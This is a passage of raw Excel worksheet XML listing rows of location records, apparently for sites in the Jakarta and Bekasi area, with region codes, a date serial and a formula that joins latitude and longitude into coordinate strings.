      <c r="B1219" s="1">
        <v>43885</v>
      </c>
      <c r="C1219">
        <v>1</v>
      </c>
      <c r="D1219" t="s">
        <v>22</v>
      </c>
      <c r="E1219" t="s">
        <v>23</v>
      </c>
      <c r="F1219" t="s">
        <v>4473</v>
      </c>
      <c r="G1219" t="s">
        <v>4474</v>
      </c>
      <c r="H1219" t="s">
        <v>26</v>
      </c>
      <c r="I1219" t="s">
        <v>4475</v>
      </c>
      <c r="J1219" t="s">
        <v>4476</v>
      </c>
      <c r="L1219" t="s">
        <v>4477</v>
      </c>
      <c r="M1219">
        <v>3173060008</v>
      </c>
      <c r="N1219">
        <v>3173060</v>
      </c>
      <c r="O1219">
        <v>3173</v>
      </c>
      <c r="P1219">
        <v>31</v>
      </c>
      <c r="Q1219" t="s">
        <v>329</v>
      </c>
      <c r="R1219" t="s">
        <v>61</v>
      </c>
      <c r="S1219" t="s">
        <v>62</v>
      </c>
      <c r="T1219" t="s">
        <v>33</v>
      </c>
      <c r="U1219" s="5">
        <v>10684414</v>
      </c>
      <c r="V1219" s="5" t="s">
        <v>15585</v>
      </c>
      <c r="W1219" s="5">
        <v>-616035</v>
      </c>
      <c r="X1219" t="s">
        <v>19365</v>
      </c>
      <c r="Y1219" t="str">
        <f t="shared" ref="Y1219:Y1282" si="19">CONCATENATE(X1219,",",V1219)</f>
        <v>-6.16035,106.84414</v>
      </c>
    </row>
    <row r="1220" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1220">
        <v>108791</v>
      </c>
      <c r="B1220" s="1">
        <v>43885</v>
      </c>
      <c r="C1220">
        <v>1</v>
      </c>
      <c r="D1220" t="s">
        <v>22</v>
      </c>
      <c r="E1220" t="s">
        <v>23</v>
      </c>
      <c r="F1220" t="s">
        <v>4478</v>
      </c>
      <c r="G1220" t="s">
        <v>4479</v>
      </c>
      <c r="H1220" t="s">
        <v>26</v>
      </c>
      <c r="I1220" t="s">
        <v>1621</v>
      </c>
      <c r="J1220" t="s">
        <v>2352</v>
      </c>
      <c r="L1220" t="s">
        <v>4480</v>
      </c>
      <c r="M1220">
        <v>3173050002</v>
      </c>
      <c r="N1220">
        <v>3173050</v>
      </c>
      <c r="O1220">
        <v>3173</v>
      </c>
      <c r="P1220">
        <v>31</v>
      </c>
      <c r="Q1220" t="s">
        <v>588</v>
      </c>
      <c r="R1220" t="s">
        <v>589</v>
      </c>
      <c r="S1220" t="s">
        <v>62</v>
      </c>
      <c r="T1220" t="s">
        <v>33</v>
      </c>
      <c r="U1220" s="5">
        <v>10687267</v>
      </c>
      <c r="V1220" s="5" t="s">
        <v>15586</v>
      </c>
      <c r="W1220" s="5">
        <v>-616982</v>
      </c>
      <c r="X1220" t="s">
        <v>19149</v>
      </c>
      <c r="Y1220" t="str">
        <f t="shared" si="19"/>
        <v>-6.16982,106.87267</v>
      </c>
    </row>
    <row r="1221" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1221">
        <v>108792</v>
      </c>
      <c r="B1221" s="1">
        <v>43885</v>
      </c>
      <c r="C1221">
        <v>1</v>
      </c>
      <c r="D1221" t="s">
        <v>22</v>
      </c>
      <c r="E1221" t="s">
        <v>23</v>
      </c>
      <c r="F1221" t="s">
        <v>4481</v>
      </c>
      <c r="G1221" t="s">
        <v>4482</v>
      </c>
      <c r="H1221" t="s">
        <v>26</v>
      </c>
      <c r="I1221" t="s">
        <v>1253</v>
      </c>
      <c r="J1221" t="s">
        <v>2352</v>
      </c>
      <c r="L1221" t="s">
        <v>4483</v>
      </c>
      <c r="M1221">
        <v>3173050002</v>
      </c>
      <c r="N1221">
        <v>3173050</v>
      </c>
      <c r="O1221">
        <v>3173</v>
      </c>
      <c r="P1221">
        <v>31</v>
      </c>
      <c r="Q1221" t="s">
        <v>588</v>
      </c>
      <c r="R1221" t="s">
        <v>589</v>
      </c>
      <c r="S1221" t="s">
        <v>62</v>
      </c>
      <c r="T1221" t="s">
        <v>33</v>
      </c>
      <c r="U1221" s="5">
        <v>10687417</v>
      </c>
      <c r="V1221" s="5" t="s">
        <v>15587</v>
      </c>
      <c r="W1221" s="5">
        <v>-617519</v>
      </c>
      <c r="X1221" t="s">
        <v>19366</v>
      </c>
      <c r="Y1221" t="str">
        <f t="shared" si="19"/>
        <v>-6.17519,106.87417</v>
      </c>
    </row>
    <row r="1222" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1222">
        <v>108793</v>
      </c>
      <c r="B1222" s="1">
        <v>43885</v>
      </c>
      <c r="C1222">
        <v>1</v>
      </c>
      <c r="D1222" t="s">
        <v>22</v>
      </c>
      <c r="E1222" t="s">
        <v>23</v>
      </c>
      <c r="F1222" t="s">
        <v>4484</v>
      </c>
      <c r="G1222" t="s">
        <v>4485</v>
      </c>
      <c r="H1222" t="s">
        <v>26</v>
      </c>
      <c r="I1222" t="s">
        <v>4486</v>
      </c>
      <c r="J1222" t="s">
        <v>4487</v>
      </c>
      <c r="L1222" t="s">
        <v>4488</v>
      </c>
      <c r="M1222">
        <v>3171070001</v>
      </c>
      <c r="N1222">
        <v>3171070</v>
      </c>
      <c r="O1222">
        <v>3171</v>
      </c>
      <c r="P1222">
        <v>31</v>
      </c>
      <c r="Q1222" t="s">
        <v>120</v>
      </c>
      <c r="R1222" t="s">
        <v>121</v>
      </c>
      <c r="S1222" t="s">
        <v>108</v>
      </c>
      <c r="T1222" t="s">
        <v>33</v>
      </c>
      <c r="U1222" s="5">
        <v>10682455</v>
      </c>
      <c r="V1222" s="5" t="s">
        <v>15588</v>
      </c>
      <c r="W1222" s="5">
        <v>-625611</v>
      </c>
      <c r="X1222" t="s">
        <v>19367</v>
      </c>
      <c r="Y1222" t="str">
        <f t="shared" si="19"/>
        <v>-6.25611,106.82455</v>
      </c>
    </row>
    <row r="1223" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1223">
        <v>108794</v>
      </c>
      <c r="B1223" s="1">
        <v>43885</v>
      </c>
      <c r="C1223">
        <v>1</v>
      </c>
      <c r="D1223" t="s">
        <v>22</v>
      </c>
      <c r="E1223" t="s">
        <v>23</v>
      </c>
      <c r="F1223" t="s">
        <v>4489</v>
      </c>
      <c r="G1223" t="s">
        <v>4490</v>
      </c>
      <c r="H1223" t="s">
        <v>26</v>
      </c>
      <c r="I1223" t="s">
        <v>2002</v>
      </c>
      <c r="J1223" t="s">
        <v>2627</v>
      </c>
      <c r="L1223" t="s">
        <v>4491</v>
      </c>
      <c r="M1223">
        <v>3275010011</v>
      </c>
      <c r="N1223">
        <v>3275010</v>
      </c>
      <c r="O1223">
        <v>3275</v>
      </c>
      <c r="P1223">
        <v>32</v>
      </c>
      <c r="Q1223" t="s">
        <v>2389</v>
      </c>
      <c r="R1223" t="s">
        <v>287</v>
      </c>
      <c r="S1223" t="s">
        <v>41</v>
      </c>
      <c r="T1223" t="s">
        <v>42</v>
      </c>
      <c r="U1223" s="5">
        <v>10691325</v>
      </c>
      <c r="V1223" s="5" t="s">
        <v>15560</v>
      </c>
      <c r="W1223" s="5">
        <v>-626198</v>
      </c>
      <c r="X1223" t="s">
        <v>19342</v>
      </c>
      <c r="Y1223" t="str">
        <f t="shared" si="19"/>
        <v>-6.26198,106.91325</v>
      </c>
    </row>
    <row r="1224" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1224">
        <v>108795</v>
      </c>
      <c r="B1224" s="1">
        <v>43885</v>
      </c>
      <c r="C1224">
        <v>1</v>
      </c>
      <c r="D1224" t="s">
        <v>22</v>
      </c>
      <c r="E1224" t="s">
        <v>23</v>
      </c>
      <c r="F1224" t="s">
        <v>4492</v>
      </c>
      <c r="H1224" t="s">
        <v>26</v>
      </c>
      <c r="I1224" t="s">
        <v>290</v>
      </c>
      <c r="J1224" t="s">
        <v>2527</v>
      </c>
      <c r="L1224" t="s">
        <v>4493</v>
      </c>
      <c r="M1224">
        <v>3174030006</v>
      </c>
      <c r="N1224">
        <v>3174030</v>
      </c>
      <c r="O1224">
        <v>3174</v>
      </c>
      <c r="P1224">
        <v>31</v>
      </c>
      <c r="Q1224" t="s">
        <v>2529</v>
      </c>
      <c r="R1224" t="s">
        <v>1487</v>
      </c>
      <c r="S1224" t="s">
        <v>32</v>
      </c>
      <c r="T1224" t="s">
        <v>33</v>
      </c>
      <c r="U1224" s="5">
        <v>10680596</v>
      </c>
      <c r="V1224" s="5" t="s">
        <v>15232</v>
      </c>
      <c r="W1224" s="5">
        <v>-618028</v>
      </c>
      <c r="X1224" t="s">
        <v>19031</v>
      </c>
      <c r="Y1224" t="str">
        <f t="shared" si="19"/>
        <v>-6.18028,106.80596</v>
      </c>
    </row>
    <row r="1225" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1225">
        <v>108796</v>
      </c>
      <c r="B1225" s="1">
        <v>43885</v>
      </c>
      <c r="C1225">
        <v>1</v>
      </c>
      <c r="D1225" t="s">
        <v>22</v>
      </c>
      <c r="E1225" t="s">
        <v>23</v>
      </c>
      <c r="F1225" t="s">
        <v>4494</v>
      </c>
      <c r="G1225" t="s">
        <v>4495</v>
      </c>
      <c r="H1225" t="s">
        <v>26</v>
      </c>
      <c r="I1225" t="s">
        <v>882</v>
      </c>
      <c r="J1225" t="s">
        <v>2627</v>
      </c>
      <c r="L1225" t="s">
        <v>4496</v>
      </c>
      <c r="M1225">
        <v>3275040007</v>
      </c>
      <c r="N1225">
        <v>3275040</v>
      </c>
      <c r="O1225">
        <v>3275</v>
      </c>
      <c r="P1225">
        <v>32</v>
      </c>
      <c r="Q1225" t="s">
        <v>99</v>
      </c>
      <c r="R1225" t="s">
        <v>100</v>
      </c>
      <c r="S1225" t="s">
        <v>41</v>
      </c>
      <c r="T1225" t="s">
        <v>42</v>
      </c>
      <c r="U1225" s="5">
        <v>10702209</v>
      </c>
      <c r="V1225" s="5" t="s">
        <v>15589</v>
      </c>
      <c r="W1225" s="5">
        <v>-623893</v>
      </c>
      <c r="X1225" t="s">
        <v>19368</v>
      </c>
      <c r="Y1225" t="str">
        <f t="shared" si="19"/>
        <v>-6.23893,107.02209</v>
      </c>
    </row>
    <row r="1226" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1226">
        <v>108797</v>
      </c>
      <c r="B1226" s="1">
        <v>43885</v>
      </c>
      <c r="C1226">
        <v>1</v>
      </c>
      <c r="D1226" t="s">
        <v>22</v>
      </c>
      <c r="E1226" t="s">
        <v>23</v>
      </c>
      <c r="F1226" t="s">
        <v>4497</v>
      </c>
      <c r="G1226" t="s">
        <v>4498</v>
      </c>
      <c r="H1226" t="s">
        <v>26</v>
      </c>
      <c r="I1226" t="s">
        <v>4499</v>
      </c>
      <c r="J1226" t="s">
        <v>2777</v>
      </c>
      <c r="M1226">
        <v>3171070002</v>
      </c>
      <c r="N1226">
        <v>3171070</v>
      </c>
      <c r="O1226">
        <v>3171</v>
      </c>
      <c r="P1226">
        <v>31</v>
      </c>
      <c r="Q1226" t="s">
        <v>2142</v>
      </c>
      <c r="R1226" t="s">
        <v>121</v>
      </c>
      <c r="S1226" t="s">
        <v>108</v>
      </c>
      <c r="T1226" t="s">
        <v>33</v>
      </c>
      <c r="U1226" s="5">
        <v>10682367</v>
      </c>
      <c r="V1226" s="5" t="s">
        <v>15590</v>
      </c>
      <c r="W1226" s="5">
        <v>-625124</v>
      </c>
      <c r="X1226" t="s">
        <v>19369</v>
      </c>
      <c r="Y1226" t="str">
        <f t="shared" si="19"/>
        <v>-6.25124,106.82367</v>
      </c>
    </row>
    <row r="1227" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1227">
        <v>108798</v>
      </c>
      <c r="B1227" s="1">
        <v>43885</v>
      </c>
      <c r="C1227">
        <v>1</v>
      </c>
      <c r="D1227" t="s">
        <v>22</v>
      </c>
      <c r="E1227" t="s">
        <v>23</v>
      </c>
      <c r="F1227" t="s">
        <v>4500</v>
      </c>
      <c r="H1227" t="s">
        <v>26</v>
      </c>
      <c r="I1227" t="s">
        <v>443</v>
      </c>
      <c r="J1227" t="s">
        <v>2627</v>
      </c>
      <c r="L1227" t="s">
        <v>4501</v>
      </c>
      <c r="M1227">
        <v>3275050001</v>
      </c>
      <c r="N1227">
        <v>3275050</v>
      </c>
      <c r="O1227">
        <v>3275</v>
      </c>
      <c r="P1227">
        <v>32</v>
      </c>
      <c r="Q1227" t="s">
        <v>4376</v>
      </c>
      <c r="R1227" t="s">
        <v>955</v>
      </c>
      <c r="S1227" t="s">
        <v>41</v>
      </c>
      <c r="T1227" t="s">
        <v>42</v>
      </c>
      <c r="U1227" s="5">
        <v>10696071</v>
      </c>
      <c r="V1227" s="5" t="s">
        <v>15591</v>
      </c>
      <c r="W1227" s="5">
        <v>-626030</v>
      </c>
      <c r="X1227" t="s">
        <v>19370</v>
      </c>
      <c r="Y1227" t="str">
        <f t="shared" si="19"/>
        <v>-6.26030,106.96071</v>
      </c>
    </row>
    <row r="1228" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1228">
        <v>108799</v>
      </c>
      <c r="B1228" s="1">
        <v>43885</v>
      </c>
      <c r="C1228">
        <v>1</v>
      </c>
      <c r="D1228" t="s">
        <v>22</v>
      </c>
      <c r="E1228" t="s">
        <v>23</v>
      </c>
      <c r="F1228" t="s">
        <v>4502</v>
      </c>
      <c r="H1228" t="s">
        <v>26</v>
      </c>
      <c r="I1228" t="s">
        <v>1253</v>
      </c>
      <c r="J1228" t="s">
        <v>3066</v>
      </c>
      <c r="L1228" t="s">
        <v>4503</v>
      </c>
      <c r="M1228">
        <v>3173020001</v>
      </c>
      <c r="N1228">
        <v>3173020</v>
      </c>
      <c r="O1228">
        <v>3173</v>
      </c>
      <c r="P1228">
        <v>31</v>
      </c>
      <c r="Q1228" t="s">
        <v>179</v>
      </c>
      <c r="R1228" t="s">
        <v>179</v>
      </c>
      <c r="S1228" t="s">
        <v>62</v>
      </c>
      <c r="T1228" t="s">
        <v>33</v>
      </c>
      <c r="U1228" s="5">
        <v>10683517</v>
      </c>
      <c r="V1228" s="5" t="s">
        <v>15592</v>
      </c>
      <c r="W1228" s="5">
        <v>-619926</v>
      </c>
      <c r="X1228" t="s">
        <v>18957</v>
      </c>
      <c r="Y1228" t="str">
        <f t="shared" si="19"/>
        <v>-6.19926,106.83517</v>
      </c>
    </row>
    <row r="1229" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1229">
        <v>108800</v>
      </c>
      <c r="B1229" s="1">
        <v>43885</v>
      </c>
      <c r="C1229">
        <v>1</v>
      </c>
      <c r="D1229" t="s">
        <v>22</v>
      </c>
      <c r="E1229" t="s">
        <v>23</v>
      </c>
      <c r="F1229" t="s">
        <v>4504</v>
      </c>
      <c r="H1229" t="s">
        <v>26</v>
      </c>
      <c r="I1229" t="s">
        <v>1559</v>
      </c>
      <c r="J1229" t="s">
        <v>2627</v>
      </c>
      <c r="L1229" t="s">
        <v>4505</v>
      </c>
      <c r="M1229">
        <v>3275010008</v>
      </c>
      <c r="N1229">
        <v>3275010</v>
      </c>
      <c r="O1229">
        <v>3275</v>
      </c>
      <c r="P1229">
        <v>32</v>
      </c>
      <c r="Q1229" t="s">
        <v>2236</v>
      </c>
      <c r="R1229" t="s">
        <v>287</v>
      </c>
      <c r="S1229" t="s">
        <v>41</v>
      </c>
      <c r="T1229" t="s">
        <v>42</v>
      </c>
      <c r="U1229" s="5">
        <v>10692139</v>
      </c>
      <c r="V1229" s="5" t="s">
        <v>15593</v>
      </c>
      <c r="W1229" s="5">
        <v>-628084</v>
      </c>
      <c r="X1229" t="s">
        <v>19371</v>
      </c>
      <c r="Y1229" t="str">
        <f t="shared" si="19"/>
        <v>-6.28084,106.92139</v>
      </c>
    </row>
    <row r="1230" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1230">
        <v>108801</v>
      </c>
      <c r="B1230" s="1">
        <v>43885</v>
      </c>
      <c r="C1230">
        <v>1</v>
      </c>
      <c r="D1230" t="s">
        <v>22</v>
      </c>
      <c r="E1230" t="s">
        <v>23</v>
      </c>
      <c r="F1230" t="s">
        <v>4506</v>
      </c>
      <c r="G1230" t="s">
        <v>4507</v>
      </c>
      <c r="H1230" t="s">
        <v>26</v>
      </c>
      <c r="I1230" t="s">
        <v>1504</v>
      </c>
      <c r="J1230" t="s">
        <v>4508</v>
      </c>
      <c r="L1230" t="s">
        <v>4509</v>
      </c>
      <c r="M1230">
        <v>3172100005</v>
      </c>
      <c r="N1230">
        <v>3172100</v>
      </c>
      <c r="O1230">
        <v>3172</v>
      </c>
      <c r="P1230">
        <v>31</v>
      </c>
      <c r="Q1230" t="s">
        <v>1773</v>
      </c>
      <c r="R1230" t="s">
        <v>1436</v>
      </c>
      <c r="S1230" t="s">
        <v>49</v>
      </c>
      <c r="T1230" t="s">
        <v>33</v>
      </c>
      <c r="U1230" s="5">
        <v>10686696</v>
      </c>
      <c r="V1230" s="5" t="s">
        <v>15594</v>
      </c>
      <c r="W1230" s="5">
        <v>-620227</v>
      </c>
      <c r="X1230" t="s">
        <v>19372</v>
      </c>
      <c r="Y1230" t="str">
        <f t="shared" si="19"/>
        <v>-6.20227,106.86696</v>
      </c>
    </row>
    <row r="1231" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1231">
        <v>108802</v>
      </c>
      <c r="B1231" s="1">
        <v>43885</v>
      </c>
      <c r="C1231">
        <v>1</v>
      </c>
      <c r="D1231" t="s">
        <v>22</v>
      </c>
      <c r="E1231" t="s">
        <v>23</v>
      </c>
      <c r="F1231" t="s">
        <v>4510</v>
      </c>
      <c r="G1231" t="s">
        <v>4511</v>
      </c>
      <c r="H1231" t="s">
        <v>26</v>
      </c>
      <c r="I1231" t="s">
        <v>4512</v>
      </c>
      <c r="J1231" t="s">
        <v>2176</v>
      </c>
      <c r="L1231" t="s">
        <v>4513</v>
      </c>
      <c r="M1231">
        <v>3172050006</v>
      </c>
      <c r="N1231">
        <v>3172050</v>
      </c>
      <c r="O1231">
        <v>3172</v>
      </c>
      <c r="P1231">
        <v>31</v>
      </c>
      <c r="Q1231" t="s">
        <v>357</v>
      </c>
      <c r="R1231" t="s">
        <v>358</v>
      </c>
      <c r="S1231" t="s">
        <v>49</v>
      </c>
      <c r="T1231" t="s">
        <v>33</v>
      </c>
      <c r="U1231" s="5">
        <v>10686089</v>
      </c>
      <c r="V1231" s="5" t="s">
        <v>15595</v>
      </c>
      <c r="W1231" s="5">
        <v>-625829</v>
      </c>
      <c r="X1231" t="s">
        <v>19373</v>
      </c>
      <c r="Y1231" t="str">
        <f t="shared" si="19"/>
        <v>-6.25829,106.86089</v>
      </c>
    </row>
    <row r="1232" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1232">
        <v>108803</v>
      </c>
      <c r="B1232" s="1">
        <v>43885</v>
      </c>
      <c r="C1232">
        <v>1</v>
      </c>
      <c r="D1232" t="s">
        <v>22</v>
      </c>
      <c r="E1232" t="s">
        <v>23</v>
      </c>
      <c r="F1232" t="s">
        <v>4514</v>
      </c>
      <c r="G1232" t="s">
        <v>4515</v>
      </c>
      <c r="H1232" t="s">
        <v>26</v>
      </c>
      <c r="I1232" t="s">
        <v>4516</v>
      </c>
      <c r="J1232" t="s">
        <v>4517</v>
      </c>
      <c r="L1232" t="s">
        <v>4518</v>
      </c>
      <c r="M1232">
        <v>3173010003</v>
      </c>
      <c r="N1232">
        <v>3173010</v>
      </c>
      <c r="O1232">
        <v>3173</v>
      </c>
      <c r="P1232">
        <v>31</v>
      </c>
      <c r="Q1232" t="s">
        <v>2338</v>
      </c>
      <c r="R1232" t="s">
        <v>1481</v>
      </c>
      <c r="S1232" t="s">
        <v>62</v>
      </c>
      <c r="T1232" t="s">
        <v>33</v>
      </c>
      <c r="U1232" s="5">
        <v>10682000</v>
      </c>
      <c r="V1232" s="5" t="s">
        <v>15596</v>
      </c>
      <c r="W1232" s="5">
        <v>-620458</v>
      </c>
      <c r="X1232" t="s">
        <v>19374</v>
      </c>
      <c r="Y1232" t="str">
        <f t="shared" si="19"/>
        <v>-6.20458,106.82000</v>
      </c>
    </row>
    <row r="1233" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1233">
        <v>108804</v>
      </c>
      <c r="B1233" s="1">
        <v>43885</v>
      </c>
      <c r="C1233">
        <v>1</v>
      </c>
      <c r="D1233" t="s">
        <v>22</v>
      </c>
      <c r="E1233" t="s">
        <v>23</v>
      </c>
      <c r="F1233" t="s">
        <v>4519</v>
      </c>
      <c r="H1233" t="s">
        <v>26</v>
      </c>
      <c r="I1233" t="s">
        <v>4520</v>
      </c>
      <c r="J1233" t="s">
        <v>4521</v>
      </c>
      <c r="L1233" t="s">
        <v>4522</v>
      </c>
      <c r="M1233">
        <v>3172070007</v>
      </c>
      <c r="N1233">
        <v>3172070</v>
      </c>
      <c r="O1233">
        <v>3172</v>
      </c>
      <c r="P1233">
        <v>31</v>
      </c>
      <c r="Q1233" t="s">
        <v>3186</v>
      </c>
      <c r="R1233" t="s">
        <v>128</v>
      </c>
      <c r="S1233" t="s">
        <v>49</v>
      </c>
      <c r="T1233" t="s">
        <v>33</v>
      </c>
      <c r="U1233" s="5">
        <v>10691848</v>
      </c>
      <c r="V1233" s="5" t="s">
        <v>15597</v>
      </c>
      <c r="W1233" s="5">
        <v>-621901</v>
      </c>
      <c r="X1233" t="s">
        <v>19375</v>
      </c>
      <c r="Y1233" t="str">
        <f t="shared" si="19"/>
        <v>-6.21901,106.91848</v>
      </c>
    </row>
    <row r="1234" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1234">
        <v>108805</v>
      </c>
      <c r="B1234" s="1">
        <v>43885</v>
      </c>
      <c r="C1234">
        <v>1</v>
      </c>
      <c r="D1234" t="s">
        <v>22</v>
      </c>
      <c r="E1234" t="s">
        <v>23</v>
      </c>
      <c r="F1234" t="s">
        <v>4523</v>
      </c>
      <c r="G1234" t="s">
        <v>4524</v>
      </c>
      <c r="H1234" t="s">
        <v>26</v>
      </c>
      <c r="I1234" t="s">
        <v>1051</v>
      </c>
      <c r="J1234" t="s">
        <v>4119</v>
      </c>
      <c r="L1234" t="s">
        <v>3208</v>
      </c>
      <c r="M1234">
        <v>3172080001</v>
      </c>
      <c r="N1234">
        <v>3172080</v>
      </c>
      <c r="O1234">
        <v>3172</v>
      </c>
      <c r="P1234">
        <v>31</v>
      </c>
      <c r="Q1234" t="s">
        <v>48</v>
      </c>
      <c r="R1234" t="s">
        <v>141</v>
      </c>
      <c r="S1234" t="s">
        <v>49</v>
      </c>
      <c r="T1234" t="s">
        <v>33</v>
      </c>
      <c r="U1234" s="5">
        <v>10691109</v>
      </c>
      <c r="V1234" s="5" t="s">
        <v>15598</v>
      </c>
      <c r="W1234" s="5">
        <v>-621299</v>
      </c>
      <c r="X1234" t="s">
        <v>19376</v>
      </c>
      <c r="Y1234" t="str">
        <f t="shared" si="19"/>
        <v>-6.21299,106.91109</v>
      </c>
    </row>
    <row r="1235" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1235">
        <v>108806</v>
      </c>
      <c r="B1235" s="1">
        <v>43885</v>
      </c>
      <c r="C1235">
        <v>1</v>
      </c>
      <c r="D1235" t="s">
        <v>22</v>
      </c>
      <c r="E1235" t="s">
        <v>23</v>
      </c>
      <c r="F1235" t="s">
        <v>4525</v>
      </c>
      <c r="H1235" t="s">
        <v>26</v>
      </c>
      <c r="I1235" t="s">
        <v>3652</v>
      </c>
      <c r="J1235" t="s">
        <v>4526</v>
      </c>
      <c r="L1235" t="s">
        <v>4527</v>
      </c>
      <c r="M1235">
        <v>3173040001</v>
      </c>
      <c r="N1235">
        <v>3173040</v>
      </c>
      <c r="O1235">
        <v>3173</v>
      </c>
      <c r="P1235">
        <v>31</v>
      </c>
      <c r="Q1235" t="s">
        <v>1598</v>
      </c>
      <c r="R1235" t="s">
        <v>1598</v>
      </c>
      <c r="S1235" t="s">
        <v>62</v>
      </c>
      <c r="T1235" t="s">
        <v>33</v>
      </c>
      <c r="U1235" s="5">
        <v>10685307</v>
      </c>
      <c r="V1235" s="5" t="s">
        <v>15599</v>
      </c>
      <c r="W1235" s="5">
        <v>-618767</v>
      </c>
      <c r="X1235" t="s">
        <v>19377</v>
      </c>
      <c r="Y1235" t="str">
        <f t="shared" si="19"/>
        <v>-6.18767,106.85307</v>
      </c>
    </row>
    <row r="1236" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1236">
        <v>108807</v>
      </c>
      <c r="B1236" s="1">
        <v>43885</v>
      </c>
      <c r="C1236">
        <v>1</v>
      </c>
      <c r="D1236" t="s">
        <v>22</v>
      </c>
      <c r="E1236" t="s">
        <v>23</v>
      </c>
      <c r="F1236" t="s">
        <v>4528</v>
      </c>
      <c r="G1236" t="s">
        <v>4529</v>
      </c>
      <c r="H1236" t="s">
        <v>26</v>
      </c>
      <c r="I1236" t="s">
        <v>2598</v>
      </c>
      <c r="J1236" t="s">
        <v>4530</v>
      </c>
      <c r="M1236">
        <v>3173070001</v>
      </c>
      <c r="N1236">
        <v>3173070</v>
      </c>
      <c r="O1236">
        <v>3173</v>
      </c>
      <c r="P1236">
        <v>31</v>
      </c>
      <c r="Q1236" t="s">
        <v>322</v>
      </c>
      <c r="R1236" t="s">
        <v>323</v>
      </c>
      <c r="S1236" t="s">
        <v>62</v>
      </c>
      <c r="T1236" t="s">
        <v>33</v>
      </c>
      <c r="U1236" s="5">
        <v>10683074</v>
      </c>
      <c r="V1236" s="5" t="s">
        <v>15600</v>
      </c>
      <c r="W1236" s="5">
        <v>-616556</v>
      </c>
      <c r="X1236" t="s">
        <v>19378</v>
      </c>
      <c r="Y1236" t="str">
        <f t="shared" si="19"/>
        <v>-6.16556,106.83074</v>
      </c>
    </row>
    <row r="1237" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1237">
        <v>108808</v>
      </c>
      <c r="B1237" s="1">
        <v>43885</v>
      </c>
      <c r="C1237">
        <v>1</v>
      </c>
      <c r="D1237" t="s">
        <v>22</v>
      </c>
      <c r="E1237" t="s">
        <v>23</v>
      </c>
      <c r="F1237" t="s">
        <v>4531</v>
      </c>
      <c r="G1237" t="s">
        <v>4532</v>
      </c>
      <c r="H1237" t="s">
        <v>26</v>
      </c>
      <c r="I1237" t="s">
        <v>945</v>
      </c>
      <c r="J1237" t="s">
        <v>4533</v>
      </c>
      <c r="L1237" t="s">
        <v>4534</v>
      </c>
      <c r="M1237">
        <v>3173060007</v>
      </c>
      <c r="N1237">
        <v>3173060</v>
      </c>
      <c r="O1237">
        <v>3173</v>
      </c>
      <c r="P1237">
        <v>31</v>
      </c>
      <c r="Q1237" t="s">
        <v>61</v>
      </c>
      <c r="R1237" t="s">
        <v>61</v>
      </c>
      <c r="S1237" t="s">
        <v>62</v>
      </c>
      <c r="T1237" t="s">
        <v>33</v>
      </c>
      <c r="U1237" s="5">
        <v>10684262</v>
      </c>
      <c r="V1237" s="5" t="s">
        <v>15601</v>
      </c>
      <c r="W1237" s="5">
        <v>-616729</v>
      </c>
      <c r="X1237" t="s">
        <v>19379</v>
      </c>
      <c r="Y1237" t="str">
        <f t="shared" si="19"/>
        <v>-6.16729,106.84262</v>
      </c>
    </row>
    <row r="1238" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1238">
        <v>108809</v>
      </c>
      <c r="B1238" s="1">
        <v>43885</v>
      </c>
      <c r="C1238">
        <v>1</v>
      </c>
      <c r="D1238" t="s">
        <v>22</v>
      </c>
      <c r="E1238" t="s">
        <v>23</v>
      </c>
      <c r="F1238" t="s">
        <v>4535</v>
      </c>
      <c r="G1238" t="s">
        <v>4536</v>
      </c>
      <c r="H1238" t="s">
        <v>26</v>
      </c>
      <c r="I1238" t="s">
        <v>4537</v>
      </c>
      <c r="J1238" t="s">
        <v>2777</v>
      </c>
      <c r="M1238">
        <v>3171070002</v>
      </c>
      <c r="N1238">
        <v>3171070</v>
      </c>
      <c r="O1238">
        <v>3171</v>
      </c>
      <c r="P1238">
        <v>31</v>
      </c>
      <c r="Q1238" t="s">
        <v>2142</v>
      </c>
      <c r="R1238" t="s">
        <v>121</v>
      </c>
      <c r="S1238" t="s">
        <v>108</v>
      </c>
      <c r="T1238" t="s">
        <v>33</v>
      </c>
      <c r="U1238" s="5">
        <v>10682189</v>
      </c>
      <c r="V1238" s="5" t="s">
        <v>15602</v>
      </c>
      <c r="W1238" s="5">
        <v>-624580</v>
      </c>
      <c r="X1238" t="s">
        <v>19380</v>
      </c>
      <c r="Y1238" t="str">
        <f t="shared" si="19"/>
        <v>-6.24580,106.82189</v>
      </c>
    </row>
    <row r="1239" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1239">
        <v>108810</v>
      </c>
      <c r="B1239" s="1">
        <v>43885</v>
      </c>
      <c r="C1239">
        <v>1</v>
      </c>
      <c r="D1239" t="s">
        <v>22</v>
      </c>
      <c r="E1239" t="s">
        <v>23</v>
      </c>
      <c r="F1239" t="s">
        <v>4538</v>
      </c>
      <c r="G1239" t="s">
        <v>4539</v>
      </c>
      <c r="H1239" t="s">
        <v>26</v>
      </c>
      <c r="I1239" t="s">
        <v>1055</v>
      </c>
      <c r="J1239" t="s">
        <v>3166</v>
      </c>
      <c r="L1239" t="s">
        <v>3421</v>
      </c>
      <c r="M1239">
        <v>3172100002</v>
      </c>
      <c r="N1239">
        <v>3172100</v>
      </c>
      <c r="O1239">
        <v>3172</v>
      </c>
      <c r="P1239">
        <v>31</v>
      </c>
      <c r="Q1239" t="s">
        <v>3168</v>
      </c>
      <c r="R1239" t="s">
        <v>1436</v>
      </c>
      <c r="S1239" t="s">
        <v>49</v>
      </c>
      <c r="T1239" t="s">
        <v>33</v>
      </c>
      <c r="U1239" s="5">
        <v>10685647</v>
      </c>
      <c r="V1239" s="5" t="s">
        <v>15187</v>
